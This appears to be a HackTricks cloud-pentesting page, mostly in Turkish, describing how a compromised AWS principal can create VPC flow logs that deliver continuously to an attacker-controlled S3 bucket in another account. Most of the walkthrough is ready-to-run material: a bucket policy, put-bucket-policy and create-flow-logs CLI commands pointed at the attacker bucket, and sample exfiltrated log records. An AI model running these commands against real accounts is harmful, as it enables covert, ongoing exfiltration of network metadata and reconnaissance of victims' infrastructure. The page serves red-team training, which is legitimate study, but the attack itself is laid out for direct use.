AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Özet

ec2:CreateFlowLogs’ı kullanarak VPC, subnet veya ENI flow loglarını doğrudan attacker-controlled S3 bucket’a aktarın. Delivery role external bucket’a yazacak şekilde yapılandırıldığında, izlenen kaynaktaki her bağlantı victim account’tan akıtılır.

Gereksinimler

  • Victim principal: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, and iam:PassRole (if a delivery role is required/created).
  • Attacker bucket: S3 policy that trusts delivery.logs.amazonaws.com with s3:PutObject and bucket-owner-full-control.
  • Opsiyonel: S3 yerine CloudWatch’a aktarıyorsanız logs:DescribeLogGroups (burada gerekli değil).

Attack Walkthrough

  1. Attacker attacker account’unda, VPC Flow Logs delivery service’in objeleri yazmasına izin veren bir S3 bucket policy hazırlar. Uygulamadan önce placeholder’ları değiştirin:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}

Saldırgan hesabından uygula:

aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
  1. Victim (compromised principal) attacker bucket’ı hedefleyen flow logs oluşturur:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"

Birkaç dakika içinde, izlenen VPC/subnet içindeki tüm ENI’lere ait bağlantıları içeren flow log dosyaları attacker bucket’ta görünür.

Kanıt

attacker bucket’a yazılan örnek flow log kayıtları:

version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Bucket listeleme kanıtı:

aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Etki

  • İzlenen VPC/subnet/ENI için sürekli ağ metadata exfiltration (source/destination IPs, ports, protocols).
  • Trafik analizi, hassas hizmetlerin tespiti ve hedef hesabın dışından security group yanlış yapılandırmaları için hunting yapılmasına olanak tanır.

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin